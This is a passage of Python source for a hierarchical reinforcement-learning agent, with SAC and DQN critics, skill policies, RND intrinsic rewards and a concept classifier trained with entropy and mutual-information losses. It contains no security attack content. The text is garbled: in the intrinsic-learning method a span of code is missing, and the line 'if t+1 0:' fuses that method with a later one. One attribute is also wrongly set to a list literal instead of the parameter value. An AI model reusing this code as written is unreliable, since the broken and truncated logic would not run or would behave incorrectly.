self.params['DQL_epsds_target_update'] \n self.entropy_annealing = self.params['entropy_annealing']\n self.RND_update_proportion = self.params['RND_update_proportion']\n self.active_intrinsic_learning = self.params['intrinsic_learning']\n self.target_update_rate = ['target_update_rate']\n\n self.min_skill_entropy = 0.95 * (-np.log(1/(self.n_skills+1))) # TODO: add to param dict.\n self.novelty_factor = 1.0/np.log(100.0) # TODO: add to param dict.\n\n # Metric weights\n self.min_threshold_entropy_alpha = -a_dim*1.0/2 # TODO: change name or eliminate if not necessary\n self.threshold_entropy_alpha = self.params['init_threshold_entropy_alpha'] # TODO: change name or eliminate if not necessary\n self.delta_threshold_entropy_alpha = self.params['delta_threshold_entropy_alpha'] # TODO: change name or eliminate if not necessary \n alpha = self.params['alpha']\n self.alpha = {} # TODO: allow alpha to depend on task\n for learning_type in ['sl', 'ql', 'cl']: # TODO\n self.alpha[learning_type] = alpha[learning_type]\n \n # self.eta = {}\n # eta = self.params['init_eta']\n # for learning_type in ['ql', 'tl']:\n # self.eta[learning_type] = (eta[learning_type] * torch.ones(self.n_tasks[learning_type]).float().to(device) if is_float(eta[learning_type]) else \n # (eta[learning_type].float().to(device) if is_tensor(eta[learning_type]) else torch.from_numpy(eta[learning_type]).float().to(device)))\n \n self.epsilon = self.params['init_epsilon']\n self.min_epsilon = self.params['min_epsilon']\n self.delta_epsilon = self.params['delta_epsilon']\n self.factor_I = self.params['factor_I']\n \n # Nets and memory\n self.v = { # TODO: change structure of low level AC\n 'sl': v_net(self.dims['last_ext']-self.dims['init_ext'], v_dim, lr=self.lr).to(device), \n }\n self.v_target = {\n 'sl': v_net(self.dims['last_ext']-self.dims['init_ext'], v_dim, lr=self.lr).to(device), \n }\n if self.stoA_learning_type == 'DQL':\n self.critic1 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 'ql': dueling_q_net(self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks['ql'], lr=self.lr).to(device),\n }\n self.critic2 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 'ql': dueling_q_net(self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks['ql'], lr=self.lr).to(device),\n }\n else:\n self.critic1 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n 'ql': discrete_AC(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], n_tasks['ql'], lr=self.lr).to(device),\n }\n self.critic2 = {\n 'sl': q_net(self.dims['last_ext']-self.dims['init_ext'], a_dim, v_dim, lr=self.lr).to(device),\n } \n\n self.actor = skill_net(self.n_skills, self.dims['last_prop']-self.dims['init_prop'], a_dim, lr=self.lr).to(device)\n self.classifier = classifier_net(self.n_concepts, self.dims['last_ext']-self.dims['init_ext'], self.n_skills+1, n_tasks=self.n_tasks['ql'], lr=3.0e-4).to(device)\n \n self.memory = {\n 'sl': Memory(self.params['memory_capacity'], n_seed=self.seed),\n 'ql': Memory(self.params['memory_capacity'], n_seed=self.seed),\n 'tl': Memory(self.params['memory_capacity'], n_seed=self.seed)\n }\n \n self.NnSdoAST_cl = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1, self.n_concepts).to(device)\n self.NAST_cl = torch.ones(self.n_tasks['ql'], self.n_concepts, self.n_skills+1).to(device)\n \n self.RND = RND_module(self.dims['last_ext']-self.dims['init_ext'], self.n_tasks['tl'], gamma_I=self.gamma_I).to(device) # TODO: fix when n_tasks['tl'] is 0\n \n self.PA_ST_tl = torch.ones(self.n_concepts, self.n_skills+1).to(device)\n self.NAST_MC = torch.zeros(self.n_concepts, self.n_skills+1).to(device)\n self.QAST_MC = torch.zeros(self.n_concepts, self.n_skills+1).to(device)\n\n self.transfer_actor = discrete_AC_mixed(self.n_skills+1, self.dims['last_ext']-self.dims['init_ext'], n_tasks['tl'], self.n_concepts, lr=self.lr).to(device)\n \n updateNet(self.v_target['sl'], self.v['sl'],1.0)\n if self.stoA_learning_type == 'DQL':\n updateNet(self.critic2['ql'], self.critic1['ql'],1.0) \n\n def memorize(self, event, learning_type, init=False):\n if init:\n self.memory[learning_type].store(event[np.newaxis,:])\n else:\n self.memory[learning_type].store(event.tolist())\n \n def relate_concept(self, state, explore=True):\n state_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n with torch.no_grad():\n return self.classifier.sample_concept(state_cuda, explore=explore)\n\n def decide(self, state, task, learning_type, explore=True, guess=False, rng=None):\n with torch.no_grad():\n if learning_type == 'ql': \n if self.stoA_learning_type == 'DQL':\n skill = self.decide_q_dist(state, task, explore=explore) if self.decision_type == 'q_dist' else self.decide_epsilon(state, task, explore=explore)\n else:\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n skill = self.critic1['ql'].sample_skill(s_cuda, task, explore=explore, rng=rng) \n return skill \n elif learning_type == 'tl':\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:self.dims['last_ext']]).to(device).view(1,-1)\n skill = self.transfer_actor.sample_skill(s_cuda, task, explore=explore, rng=rng)\n return skill \n\n def decide_q_dist(self, state, task, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:]).to(device).view(1,-1)\n q = self.critic1['ql'](s_cuda).squeeze(0)[task,:] # if np.random.rand() > 0.5 else self.critic2['ql'](s_cuda).squeeze(0)[task,:]\n with torch.no_grad():\n pi = torch.exp((q-q.max())/(self.alpha['ql']+1e-6)).view(-1)\n pi = pi / pi.sum()\n if explore:\n skill = Categorical(probs=pi).sample().item() \n else:\n tie_breaking_dist = torch.isclose(q, q.max()).float()\n tie_breaking_dist /= tie_breaking_dist.sum()\n skill = Categorical(probs=tie_breaking_dist).sample().cpu() \n return skill\n\n def decide_epsilon(self, state, task, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_ext']:]).to(device).view(1,-1)\n with torch.no_grad():\n qe = self.critic1['ql'](s_cuda)\n qe = qe.squeeze(0)[task,:]\n tie_breaking_dist = torch.isclose(qe, qe.max()).float()\n tie_breaking_dist /= tie_breaking_dist.sum()\n skill = Categorical(probs=tie_breaking_dist).sample().cpu() \n skill = skill if np.random.rand() > self.epsilon else np.random.randint(self.n_skills+1)\n return skill \n\n def act(self, state, skill, explore=True):\n s_cuda = torch.FloatTensor(state[self.dims['init_prop']:self.dims['last_prop']]).to(device)\n with torch.no_grad():\n a = self.actor.sample_action(s_cuda, skill, explore=explore)if skill < self.n_skills else np.zeros(self.a_dim)\n return a \n\n def learn_DQN(self, only_metrics=False):\n if not only_metrics:\n self.learn_DQN_DQL() if self.stoA_learning_type == 'DQL' else self.learn_DQN_SAC('ql', only_metrics=only_metrics)\n else:\n metrics = {} if self.stoA_learning_type == 'DQL' else self.learn_DQN_SAC('ql', only_metrics=only_metrics)\n return metrics\n\n def learn_DQN_DQL(self):\n self.counter += 1\n batch = self.memory['ql'].sample(self.batch_size['ql'])\n batch = np.array(batch)\n batch_size = batch.shape[0]\n\n if batch_size > 0:\n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device)\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int')\n\n # Optimize q networks \n qe = self.critic1['ql'](s)[np.arange(batch_size), T, A].view(-1,1)\n nqe = self.critic1['ql'](ns)[np.arange(batch_size), T, :]\n nqe_target = self.critic2['ql'](ns)[np.arange(batch_size), T, :]\n \n best_skills = nqe.argmax(1)\n qe_approx = re/10.0 + self.gamma_E * nqe_target[np.arange(batch_size), best_skills].view(-1,1) * (1.0-d) # + 0.5*RND_error.detach()\n \n q_loss = self.critic1['ql'].loss_func(qe, qe_approx.detach())# + self.critic1['ql'].loss_func(qi_exp, qi_exp_approx.detach()))*IS_weights\n self.critic1['ql'].optimizer.zero_grad()\n q_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].parameters(), self.clip_value)\n self.critic1['ql'].optimizer.step()\n\n if self.counter % self.DQL_epsds_target_update == 0:\n updateNet(self.critic2['ql'], self.critic1['ql'], 1.0)\n self.counter = 0\n\n # Anneal epsilon\n self.epsilon = np.max([self.epsilon - self.delta_epsilon, self.min_epsilon]) \n \n def learn_DQN_SAC(self, learning_type, only_metrics=False, learn_alpha=True):\n batch = self.memory[learning_type].sample(self.batch_size[learning_type])\n batch = np.array(batch)\n batch_size = batch.shape[0] \n \n if batch_size > 0: \n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device) / 10.0\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int') \n \n # Optimize Q\n qe1, _, qe2, _, PA_sT, log_PA_sT, alpha, log_alpha = self.critic1['ql'](s, T)\n _, nqe1t, _, nqe2t, PnA_nsT, log_PnA_nsT, _, _ = self.critic1['ql'](ns, T)\n \n nqet = torch.min(nqe1t, nqe2t)\n nve = (PnA_nsT * (nqet - alpha.view(-1,1) * log_PnA_nsT)).sum(1, keepdim=True).detach()\n qe_approx = re + self.gamma_E * nve * (1-d)\n\n qe1_A, qe2_A = qe1[np.arange(batch_size), A].view(-1,1), qe2[np.arange(batch_size), A].view(-1,1)\n qe1_loss = (qe1_A - qe_approx.detach())**2\n qe2_loss = (qe2_A - qe_approx.detach())**2\n \n PA_T = PA_sT.mean(0, keepdim=True)\n HA_sT = -(PA_sT * log_PA_sT).sum(1, keepdim=True)\n HA_sT_mean = HA_sT.detach().mean()\n qt = torch.min(qe1, qe2).detach()\n z = torch.logsumexp(qt.detach()/(alpha+1e-10), 1, keepdim=True)\n \n pi_loss = (PA_sT * (log_PA_sT - (qt/(alpha+1e-10) - z)).detach()).sum(1, keepdim=True)\n if learn_alpha:\n log_pi_target = qt.detach()/(alpha+1e-10) - z\n pi_target = torch.exp(log_pi_target) \n H_pi_target = -(pi_target * log_pi_target).sum(1, keepdim=True)\n H_pi_target_mean = H_pi_target.mean()\n scaled_min_entropy = self.min_skill_entropy * self.epsilon\n alpha_loss = log_alpha * (H_pi_target - scaled_min_entropy).detach()\n\n if not only_metrics:\n self.critic1['ql'].qe1.optimizer.zero_grad()\n qe1_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].qe1.parameters(), self.clip_value)\n self.critic1['ql'].qe1.optimizer.step()\n\n self.critic1['ql'].qe2.optimizer.zero_grad()\n qe2_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].qe2.parameters(), self.clip_value)\n self.critic1['ql'].qe2.optimizer.step()\n \n if learn_alpha:\n self.critic1['ql'].alpha_optim.zero_grad()\n alpha_loss.mean().backward()\n self.critic1['ql'].alpha_optim.step()\n self.critic1['ql'].alpha = self.critic1['ql'].log_alpha.exp()\n\n self.critic1['ql'].actor.optimizer.zero_grad()\n pi_loss.mean().backward()\n clip_grad_norm_(self.critic1['ql'].actor.parameters(), self.clip_value)\n self.critic1['ql'].actor.optimizer.step()\n\n self.critic1['ql'].update_targets(self.target_update_rate) \n\n # Anneal epsilon\n self.epsilon = np.max([self.epsilon - self.delta_epsilon, self.min_epsilon])\n \n else:\n HA_sT = torch.zeros(1).to(device)\n \n if only_metrics:\n metrics = {\n 'H(A|s,T)': HA_sT.mean().detach().cpu().numpy() \n } \n return metrics\n\n def learn_transfer_policy(self, learning_type, only_metrics=False):\n self.CG_SAC_learning(only_metrics=only_metrics)\n \n def CG_SAC_learning(self, only_metrics=False, CG=True, learn_alpha=True):\n batch = self.memory['tl'].sample(self.batch_size['tl'])\n batch = np.array(batch)\n batch_size = batch.shape[0] \n \n if batch_size > 0: \n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n re = torch.FloatTensor(batch[:,self.s_dim+1]).view(-1,1).to(device)\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n d = torch.FloatTensor(batch[:,2*self.s_dim+2]).view(-1,1).to(device)\n T = batch[:,2*self.s_dim+3].astype('int') \n\n T_one_hot = torch.zeros(batch_size, self.n_tasks['tl']).float().to(device)\n T_one_hot[np.arange(batch_size), T] = torch.ones(batch_size).float().to(device)\n \n # Optimize Q\n qe1, _, qe2, _, qi1_exp, _, qi2_exp, _, PA_sT, log_PA_sT, alpha, log_alpha, Alpha, log_Alpha = self.transfer_actor(s, T) # TODO: change name of qi_exp to qi\n _, nqe1t, _, nqe2t, _, _, _, _, PnA_nsT, log_PnA_nsT, _, _, _, _ = self.transfer_actor(ns, T)\n \n nqet = torch.min(nqe1t, nqe2t)\n nve = (PnA_nsT * (nqet - 0.01 * log_PnA_nsT)).sum(1, keepdim=True).detach()\n qe_approx = re + self.gamma_E * nve * (1-d)\n \n qe1_A, qe2_A = qe1[np.arange(batch_size), A].view(-1,1), qe2[np.arange(batch_size), A].view(-1,1)\n qe1_loss = (qe1_A - qe_approx.detach())**2\n qe2_loss = (qe2_A - qe_approx.detach())**2\n \n PA_T = PA_sT.mean(0, keepdim=True)\n HA_sT = -(PA_sT * log_PA_sT).sum(1, keepdim=True)\n HA_sT_mean = HA_sT.detach().mean()\n \n qt = torch.min(qe1, qe2).detach() + self.factor_I * torch.min(qi1_exp, qi2_exp).detach()\n z = torch.logsumexp(qt.detach()/(alpha+1e-10), 1, keepdim=True)\n\n if CG:\n PS_s = self.classifier(s)[0].detach() \n ideal_PA_sT = torch.exp(qt/(alpha.detach() + 1e-10) - z).detach()\n ideal_PA_sT = ideal_PA_sT / ideal_PA_sT.sum(1, keepdim=True)\n Z = torch.logsumexp(self.QAST_MC.detach() / (Alpha.view(-1,1) + 1e-10), 1, keepdim=True)\n PA_ST = torch.exp(self.QAST_MC.detach() / (Alpha.view(-1,1) + 1e-10) - Z)\n PA_ST = (PA_ST + 1e-10) / ((PA_ST + 1e-10).sum(1, keepdim=True)) \n \n log_PA_ST = torch.log(PA_ST + 1e-10) \n HA_ST = -(PA_ST * log_PA_ST).sum(1)\n HA_ST_mean = (PS_s * HA_ST.view(1,-1)).sum(1, keepdim=True) \n\n pi_loss = (PA_sT * (log_PA_sT - (qt/(alpha+1e-10) - z)).detach()).sum(1, keepdim=True)\n if CG or learn_alpha:\n log_novelty_ratios = self.RND.novelty_ratios(s, T[0]).detach() \n\n if CG:\n S = PS_s.argmax(1).cpu().numpy()\n HS_s = -(PS_s * torch.log(PS_s + 1e-10)).sum(1, keepdim=True)\n concept_entropy_bottleneck = 1 - HS_s.detach() / np.log(self.n_concepts)\n divergence_per_concept = (PA_sT * (log_PA_sT - log_PA_ST[S,:]).detach()).sum(1, keepdim=True)\n novelty_factor_0 = 1.0 - 1.0 / (1.0 + torch.exp(-2.0 * (log_novelty_ratios - np.log(10)))).view(-1,1)\n total_bottleneck = novelty_factor_0.detach() * concept_entropy_bottleneck\n pi_loss = (1-total_bottleneck) * pi_loss + total_bottleneck * divergence_per_concept \n\n if learn_alpha:\n log_pi_target = qt.detach()/(alpha+1e-10) - z\n pi_target = torch.exp(log_pi_target) \n H_pi_target = -(pi_target * log_pi_target).sum(1, keepdim=True)\n H_pi_target_mean = H_pi_target.mean()\n scaled_min_entropy = self.min_skill_entropy * (1.0 / (1.0 + self.novelty_factor * log_novelty_ratios))\n alpha_loss = log_alpha * (H_pi_target - scaled_min_entropy.view(-1,1)).detach()\n\n scaled_min_entropy_mean = scaled_min_entropy.mean()\n active_concepts = (self.QAST_MC.sum(-1) > 0.0).float().view(-1).detach()\n Alpha_loss = log_Alpha.view(-1) * (HA_ST.view(-1) - 0.5*(scaled_min_entropy_mean + np.log(self.n_skills + 1))).detach() * active_concepts\n \n self.transfer_actor.qe1.optimizer.zero_grad()\n qe1_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.qe1.parameters(), self.clip_value)\n self.transfer_actor.qe1.optimizer.step()\n\n self.transfer_actor.qe2.optimizer.zero_grad()\n qe2_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.qe2.parameters(), self.clip_value)\n self.transfer_actor.qe2.optimizer.step()\n\n if learn_alpha:\n self.transfer_actor.alpha_optim.zero_grad()\n alpha_loss.mean().backward()\n self.transfer_actor.alpha_optim.step()\n self.transfer_actor.alpha = self.transfer_actor.log_alpha.exp()\n\n self.transfer_actor.Alpha_optim.zero_grad()\n Alpha_loss.mean().backward()\n self.transfer_actor.Alpha_optim.step()\n self.transfer_actor.Alpha = self.transfer_actor.log_Alpha.exp()\n\n self.transfer_actor.actor.optimizer.zero_grad()\n pi_loss.mean().backward()\n clip_grad_norm_(self.transfer_actor.actor.parameters(), self.clip_value)\n self.transfer_actor.actor.optimizer.step()\n\n if CG:\n self.PA_ST_tl = PA_ST.detach().clone() \n\n self.transfer_actor.update_targets(self.target_update_rate) \n\n def MC_learning(self, episode):\n N = len(episode)\n if N > 0:\n G = 0\n returns = torch.zeros((self.n_concepts, self.n_skills + 1)).to(device)\n visited = torch.zeros((self.n_concepts, self.n_skills + 1)).to(device)\n for i in range(N-1, -1, -1):\n S, A, R = episode[i]\n G = self.gamma_E * G + R\n returns[int(S),int(A)] += G\n visited[int(S),int(A)] += 1\n self.NAST_MC = (1-0.1) * self.NAST_MC + visited\n self.QAST_MC = (self.QAST_MC + (returns - visited * self.QAST_MC)/self.NAST_MC.clamp(1.0,np.infty)).detach().clone() \n\n def intrinsic_learning(self, trajectory, reset=False):\n N = len(trajectory) \n if N > 0:\n trajectory = np.array(trajectory)\n s = torch.FloatTensor(trajectory[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = trajectory[:,self.s_dim].astype('int')\n ns = torch.FloatTensor(trajectory[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n # d = torch.FloatTensor(trajectory[:,2*self.s_dim+2]).to(device).view(-1,1)\n T = int(trajectory[0,2*self.s_dim+3])\n\n self.RND.update_obs_rms(s, T)\n ri_exp = self.RND(ns, T).sum(1, keepdim=True)\n self.r_max = max(self.r_max, ri_exp.max().item())\n \n rffs_int = torch.FloatTensor([self.RND.rff_int.update(rew) for rew in ri_exp.detach().squeeze().tolist()]).to(device)\n self.RND.rff_rms_int.update(rffs_int, T)\n ri_exp_normalized = ri_exp.detach() / self.RND.rff_rms_int.var.sqrt()\n\n mask = torch.rand(len(ri_exp)).to(device)\n mask = (mask < self.RND_update_proportion).type(torch.FloatTensor).to(device)\n intrinsic_loss = (ri_exp * mask).sum() / torch.max(mask.sum(), torch.Tensor([1]).to(device))\n\n self.RND.predictor.optimizer.zero_grad()\n intrinsic_loss.mean().backward()\n clip_grad_norm_(self.RND.predictor.parameters(), self.clip_value)\n self.RND.predictor.optimizer.step()\n\n with torch.no_grad():\n pi_end = self.transfer_actor.actor(ns[-1,:].view(1,-1))[0].squeeze(0)[T, :]\n pi_old, log_pi_old = self.transfer_actor.actor(s)\n pi_old, log_pi_old = pi_old.detach()[:, T, :], log_pi_old.detach()[:, T, :]\n PA_T = pi_old.mean(0, keepdim=True)\n HA_sT = -(pi_old * log_pi_old).sum(1, keepdim=True)\n HA_sT_mean = HA_sT.mean() \n \n qi1_end = self.transfer_actor.qi1_exploration(ns[-1,:].view(1,-1)).squeeze(0)[T, :]\n qi2_end = self.transfer_actor.qi2_exploration(ns[-1,:].view(1,-1)).squeeze(0)[T, :]\n qi_end = torch.min(qi1_end, qi2_end)\n vi_end = (pi_end * qi_end).sum()\n\n qi1_exp = self.transfer_actor.qi1_exploration(s)[:,T,:]\n qi2_exp = self.transfer_actor.qi2_exploration(s)[:,T,:]\n qi_exp = torch.min(qi1_exp, qi2_exp)\n vi_exp = (pi_old * qi_exp).sum(1, keepdim=True)\n \n return_i = torch.zeros_like(ri_exp)\n lastGAE = 0.0\n for t in range(N-1, -1, -1):\n next_val = vi_exp[t+1,:] if t+1 0:\n s_batch = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n s_batch_prop = torch.FloatTensor(batch[:,self.dims['init_prop']:self.dims['last_prop']]).to(device)\n a_batch = torch.FloatTensor(batch[:,self.s_dim:self.sa_dim]).to(device)\n r_batch = torch.FloatTensor(batch[:,self.sa_dim]).view(-1,1).to(device)\n ns_batch = torch.FloatTensor(batch[:,self.sa_dim+1+self.dims['init_ext']:self.sa_dim+1+self.dims['last_ext']]).to(device)\n d_batch = torch.FloatTensor(batch[:,self.sars_dim]).view(-1,1).to(device)\n T_batch = batch[:,self.sarsd_dim].astype('int') \n\n if not only_metrics:\n # Optimize q networks\n q1_E = self.critic1['sl'](s_batch, a_batch)[np.arange(batch_size), T_batch].view(-1,1)\n q2_E = self.critic2['sl'](s_batch, a_batch)[np.arange(batch_size), T_batch].view(-1,1)\n next_v_E = self.v_target['sl'](ns_batch)[np.arange(batch_size), T_batch].view(-1,1) \n\n q_approx_E = r_batch + self.gamma_E * next_v_E * (1-d_batch)\n \n q1_loss = self.critic1['sl'].loss_func(q1_E, q_approx_E.detach())\n self.critic1['sl'].optimizer.zero_grad()\n q1_loss.backward()\n clip_grad_norm_(self.critic1['sl'].parameters(), self.clip_value)\n self.critic1['sl'].optimizer.step()\n \n q2_loss = self.critic2['sl'].loss_func(q2_E, q_approx_E.detach())\n self.critic2['sl'].optimizer.zero_grad()\n q2_loss.backward()\n clip_grad_norm_(self.critic2['sl'].parameters(), self.clip_value)\n self.critic2['sl'].optimizer.step() \n\n # Optimize v network\n a_batch_A, log_pa_sApT_A = self.actor.sample_actions_and_llhoods_for_all_skills(s_batch_prop.detach())\n if not self.joint:\n A_batch = T_batch\n else:\n A_batch = self.critic1['ql'].sample_skills(s_batch, T_batch)\n a_batch_off = a_batch_A[np.arange(batch_size), A_batch, :]\n log_pa_sT = log_pa_sApT_A[np.arange(batch_size), A_batch].view(-1,1)\n \n q1_off_E = self.critic1['sl'](s_batch.detach(), a_batch_off)\n q2_off_E = self.critic2['sl'](s_batch.detach(), a_batch_off)\n q_off_E = torch.min(torch.stack([q1_off_E, q2_off_E]), 0)[0][np.arange(batch_size), T_batch].view(-1,1)\n \n v_approx_E = q_off_E - self.alpha['sl'] * log_pa_sT\n\n if not only_metrics:\n v_E = self.v['sl'](s_batch)[np.arange(batch_size), T_batch].view(-1,1)\n \n task_mask = torch.zeros(batch_size, self.n_skills).float().to(device)\n task_mask[np.arange(batch_size), T_batch] = torch.ones(batch_size).float().to(device)\n task_count = task_mask.sum(0).view(-1,1)\n task_mask_distribution = task_mask / (task_count.view(1,-1) + 1e-10)\n Ha_sT = -(log_pa_sT * task_mask_distribution).sum(0)\n if self.entropy_annealing: alpha_gradient = Ha_sT.detach() - self.threshold_entropy_alpha\n\n if not only_metrics:\n v_loss = self.v['sl'].loss_func(v_E.view(-1,1), v_approx_E.view(-1,1).detach())\n self.v['sl'].optimizer.zero_grad()\n v_loss.backward()\n clip_grad_norm_(self.v['sl'].parameters(), self.clip_value)\n self.v['sl'].optimizer.step()\n updateNet(self.v_target['sl'], self.v['sl'], self.target_update_rate)\n \n # Optimize skill network\n self.actor.optimizer.zero_grad() \n pi_loss = -(v_approx_E).mean() \n pi_loss.backward() \n \n clip_grad_norm_(self.actor.parameters(), self.clip_value)\n self.actor.optimizer.step() \n\n # Optimize dual variable\n if self.entropy_annealing: \n log_alpha = torch.log(self.alpha['sl'] + 1e-6)\n log_alpha -= self.lr * alpha_gradient\n self.alpha['sl'] = torch.exp(log_alpha).clamp(1e-10, 1e+3)\n\n self.threshold_entropy_alpha = np.max([self.threshold_entropy_alpha - self.delta_threshold_entropy_alpha, self.min_threshold_entropy_alpha])\n \n else:\n log_pa_sT = torch.zeros(1).to(device) \n Ha_sT = torch.zeros(1).to(device)\n \n if only_metrics:\n metrics = {\n 'H(a|s,T)': Ha_sT.mean().detach().cpu().numpy() \n } \n return metrics \n \n def learn_concepts(self):\n batch_list = self.memory['ql'].sample(self.batch_size['ql']*2)\n batch = np.array(batch_list)\n del batch_list\n \n batch_size = batch.shape[0]\n\n if batch_size > 0:\n s = torch.FloatTensor(batch[:,self.dims['init_ext']:self.dims['last_ext']]).to(device)\n A = batch[:,self.s_dim].astype('int')\n ns = torch.FloatTensor(batch[:,self.s_dim+2+self.dims['init_ext']:self.s_dim+2+self.dims['last_ext']]).to(device)\n T = batch[:,2*self.s_dim+3].astype('int')\n\n if self.stoA_learning_type == 'DQL':\n q = self.critic1['ql'](s)[np.arange(batch_size), T, :]\n PA_sT = torch.exp((q-q.max(1, keepdim=True)[0])/1.0)\n PA_sT = PA_sT / PA_sT.sum(1, keepdim=True)\n else:\n PA_sT = self.critic1['ql'].actor(s)[0][np.arange(s.shape[0]), T, :]\n A_off = PA_sT.argmax(1)\n\n A_off_one_hot = torch.zeros(batch_size, self.n_skills+1).to(device)\n A_off_one_hot[np.arange(batch_size), A_off] = torch.ones(batch_size,).to(device)\n \n A_one_hot = torch.zeros(batch_size, self.n_skills+1).to(device)\n A_one_hot[np.arange(batch_size), A] = torch.ones(batch_size,).to(device)\n\n T_one_hot = torch.zeros(batch_size, self.n_tasks['cl']).to(device)\n T_one_hot[np.arange(batch_size), T] = torch.ones(batch_size,).to(device)\n \n PT = T_one_hot.sum(0) + 1e-10\n PT = PT.view(-1,1) / PT.sum()\n PA_T_data = (A_one_hot.unsqueeze(1) * T_one_hot.unsqueeze(2)).sum(0) + 1e-10\n PA_T_data /= PA_T_data.sum(1, keepdim=True)\n \n PS_s, log_PS_s = self.classifier(s)\n PnS_ns = self.classifier(ns)[0]\n \n NAST_new = ((PS_s.unsqueeze(2) * PA_sT.unsqueeze(1)).unsqueeze(1) * T_one_hot.unsqueeze(2).unsqueeze(3)).sum(0)\n NnSAST_new = (((PS_s.unsqueeze(2) * A_one_hot.unsqueeze(1)).unsqueeze(1) * T_one_hot.unsqueeze(2).unsqueeze(3)).unsqueeze(4) * PnS_ns.unsqueeze(1).unsqueeze(2).unsqueeze(3)).sum(0)\n df1 = 0.01 * (self.NAST_cl.sum(2, keepdim=True) >= 1.0).float() # TODO: add to params\n df2 = 0.01 * (self.NnSdoAST_cl.sum(3, keepdim=True) >= 1.0).float()\n NAST = (1-df1) * self.NAST_cl + NAST_new\n NnSAST = (1-df2) * self.NnSdoAST_cl + NnSAST_new\n\n PS_T = NAST.sum(2) / NAST.sum(2).sum(1, keepdim=True)\n PA_ST = NAST / NAST.sum(2, keepdim=True)\n PnS_TdoA = NnSAST.sum(1) / NnSAST.sum(1).sum(2, keepdim=True)\n PnS_STdoA = NnSAST / NnSAST.sum(3, keepdim=True)\n PA_T = NnSAST.sum((1,3)) / NnSAST.sum((1,3)).sum(1, keepdim=True)\n PA_T_policy = NAST.sum(1) / NAST.sum(1).sum(1, keepdim=True)\n\n log_PS_T = torch.log(PS_T+1e-10)\n log_PA_ST = torch.log(PA_ST + 1e-10) \n log_PnS_TdoA = torch.log(PnS_TdoA+1e-10)\n log_PnS_STdoA = torch.log(PnS_STdoA + 1e-10)\n \n HS_T = -(PS_s * log_PS_T[T, :]).sum(1).mean()\n HS_s = -(PS_s * log_PS_s).sum(1).mean()\n ISs_T = HS_T - HS_s\n \n IS_factor = (1/((self.n_skills+1) * PA_T[T, A])).view(-1,1).detach()\n \n HA_T = -(PA_T_policy * torch.log(PA_T_policy+1e-10)).sum(1).mean()\n HA_ST = -((log_PA_ST[T,:,:] * PA_sT.unsqueeze(1)).sum(2) * PS_s).sum(1).mean() \n ISA_T = HA_T.detach() - HA_ST\n \n HnS_TdoA_wIS = -(PS_s * (PnS_ns * log_PnS_TdoA.detach()[T, A, :]).sum(1, keepdim=True)).sum(1).mean()\n HnS_TdoA = -(PnS_ns * log_PnS_TdoA[T, A, :]* IS_factor.view(-1,1)).sum(1).mean() # * IS_factor.view(-1,1)\n HnS_STdoA = -(PS_s * (PnS_ns.unsqueeze(1) * log_PnS_STdoA[T, :, A, :] * IS_factor.view(-1,1,1)).sum(2)).sum(1).mean() # * IS_factor.view(-1,1,1)\n InSS_TdoA = HnS_TdoA - HnS_STdoA\n \n beta1 = 1.0e-1 # TODO: add to params\n beta2 = 0.25e-1 # TODO: add to params\n alpha2 = 1.0*beta1 / (1-beta2) # TODO: add to params\n\n classification_loss = -torch.logsumexp(log_PA_ST[T, :, A_off] + log_PS_s, dim=1).mean()\n model_loss = -torch.logsumexp(torch.log((PnS_STdoA[T, :, A, :] * PnS_ns.unsqueeze(1)).sum(2)+1e-10) + log_PS_s, dim=1).mean()\n\n classifier_loss = (beta1 + alpha2*beta2) * ISs_T - ISA_T - alpha2 * InSS_TdoA \n classifier_loss_norm = classifier_loss\n\n self.classifier.optimizer.zero_grad()\n classifier_loss_norm.backward()\n clip_grad_norm_(self.classifier.parameters(), self.clip_value)\n self.classifier.optimizer.step()\n\n self.NAST_cl = NAST.detach().clone()\n self.NnSdoAST_cl = NnSAST.detach().clone()\n \n return(classifier_loss.detach().item(), \n HS_T.detach().item(),\n HS_s.detach().item(),\n ISs_T.detach().item(),\n HA_ST.detach().item(),\n HA_T.detach().item(),\n ISA_T.detach().item(),\n 